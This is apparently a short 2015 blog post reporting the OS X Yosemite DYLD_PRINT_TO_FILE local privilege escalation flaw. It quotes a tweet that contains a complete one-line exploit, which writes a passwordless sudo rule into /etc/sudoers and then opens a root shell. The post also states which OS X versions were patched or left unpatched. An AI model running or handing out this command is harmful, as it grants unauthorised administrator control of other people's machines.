OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability

24 Juli 2015 - MAC OS X Security Exploit

echo 'echo "`whoami` ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo su - pic.twitter.com/V70xYVIERF
— Tama g3tux (@apasih) July 24, 2015

How to bypass Apple’s security and gain administrator-level privileges on an OS X Yosemite Mac using code that fits in above tweet.
At the moment it is unclear if Apple knows about this security problem or not, because while it is already fixed in the first betas of OS X 10.11, it is left unpatched in the current release of OS X 10.10.4 or in the current beta of OS X 10.10.5.
More Detailed Information about this exploit is found at Stefan Esser Website

Get updated when I create new content.
Unsubscribe whenever. Never any spam.

Note

I'm Tama. I turn down every ad, affiliate, and sponsor request I get. I write free resources that help people. If you enjoy my content, please consider supporting what I do.

Support my work

Newsletter

Note